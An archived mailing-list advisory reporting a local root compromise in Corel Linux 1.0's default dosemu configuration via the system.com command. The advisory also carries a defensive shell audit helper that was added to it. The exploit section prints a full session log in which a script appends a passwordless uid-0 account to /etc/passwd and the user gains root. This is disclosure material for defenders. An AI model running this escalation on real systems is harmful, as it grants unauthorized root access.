Corel Linux 1.0 dosemu default configuration: Local root vuln

From: suidat_private
Date: Wed Dec 31 1969 - 15:59:59 PST


    Re all,
    
    Hadn't seen this one around yet, has been on my site for about a week now.
    
    Corel's mailserver bounced me about this IIRC? What's up Corel?
    
    Cheers.
    
    ----------------------------
    
    suidat_private - Corel Linux dosemu config error. Local root compromise.
    
    Software: 	Corel Linux 1.0 dosemu distribution configuration
    URL:		http://linux.corel.com
    Version:	Version 1.0
    Platforms:	Corel Linux only.
    Type:	 	Default misconfiguration. No one reads the README anymore??
    
    Summary:
    
    	Local users can take advantage of a packaging and configuration
    	error (which has been known and documented for a long time) to
    	execute arbitrary commands as root.
    
    	We see from the doc/README/SECURITY file as well as
    	http://www.dosemu.org/docs/README/0.98/README-3.html
    	written in 1997 that this configuration is bad.
    
    Vulnerability:
    
    	The system.com command is available to any user who runs the
    	dos emulator. This is a direct violation of the advice from
    	the SECURITY readme file:
    
    		Never allow the 'system.com' command (part of dosemu)
    		to be executed. It makes dosemu
    		execute the libc 'system() function'. Though privileges
    		are turned off, the process inherits the
    		switched uid-setting (uid=root, euid=user), hence the
    		unix process can use setreuid to gain root
    		access back. ... the rest you can imagine your self.
    
    Exploit:
    
    	This is a script log which details how to reproduce this:

    		Script started on Fri Feb 25 13:54:00 2000
    		nebula:~$ id
    		uid=1000(suid) gid=1000(suid) groups=1000(suid)
    		nebula:~$ cat > hack-corel
    		#!/bin/bash
    		echo "owned::0:0::/:/bin/bash" >> /etc/passwd
    		^D
    		nebula:~$ chmod a+rx hack-corel
    		nebula:~$ export PATH="$PATH:."
    		nebula:~$ dos
    		CPU speed set to 430/1 MHz
    		Running on CPU=586, FPU=1, rdtsc=1
    
    			[ snip bunch of dosemu crap ]
    
    		"Welcome to dosemu 0.98!
    		C:\> system hack-corel;
    		sh: : command not found
    		C:\> exitERROR: general protection at 0x3f0ff: 0
    		ERROR: SIGSEGV, protected insn...exiting!
    
    		nebula:~$ tail -1 /etc/passwd
    		owned::0:0::/:/bin/bash
    		nebula:~$ su owned
    		nebula:/home/suid# id
    		uid=0(root) gid=0(root) groups=0(root)
    		nebula:/home/suid# exit
    		exit
    		nebula:~$ exit
    
    		Script done on Fri Feb 25 13:55:27 2000
    
    Note:
    	This is not a vulnerability in dosemu itself. The documentation
    	warns users very specifically that this will happen if the system
    	is configured as such.
    
    Greets:
    
    	duke
    	cr
    	active
    	
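    An audit helper added here (it is not part of the advisory or of dosemu) that checks a host for the two conditions the SECURITY readme quoted above warns about together: a setuid dos binary and a system.com reachable from a DOS drive directory. The binary path and drive directory are assumptions passed as arguments.

```shell
#!/bin/sh
# Added audit helper, not from the advisory. Reports the two conditions the
# dosemu SECURITY readme warns about: a setuid dos binary and a system.com
# reachable from a directory exported to DOS as a drive. Both paths are
# assumptions supplied by the caller. Returns the number of findings (0 = clean).
audit_dosemu() {
    dos_bin="$1"   # assumed, e.g. /usr/bin/dos
    dos_dir="$2"   # assumed, directory exported to DOS as a drive
    count=0

    # Finding 1: the emulator binary carries the setuid bit, so a DOS session
    # starts with the switched uid-setting the readme describes.
    if [ -u "$dos_bin" ]; then
        owner=$(ls -ln "$dos_bin" | awk '{print $3}')
        echo "FINDING: $dos_bin has the setuid bit set (owner uid $owner)"
        count=$((count + 1))
    fi

    # Finding 2: system.com is present, which is what lets a DOS session call
    # libc system(). DOS file names are usually upper case, so match any case.
    hits=$(find "$dos_dir" -type f -iname 'system.com' 2>/dev/null || true)
    if [ -n "$hits" ]; then
        echo "FINDING: system.com reachable from $dos_dir:"
        echo "$hits"
        count=$((count + 1))
    fi

    if [ "$count" -eq 0 ]; then
        echo "OK: no setuid dos binary and no system.com under $dos_dir"
    else
        echo "Remove system.com from the DOS drive or clear the setuid bit (chmod u-s $dos_bin)."
    fi
    return "$count"
}
```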
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:38:45 PDT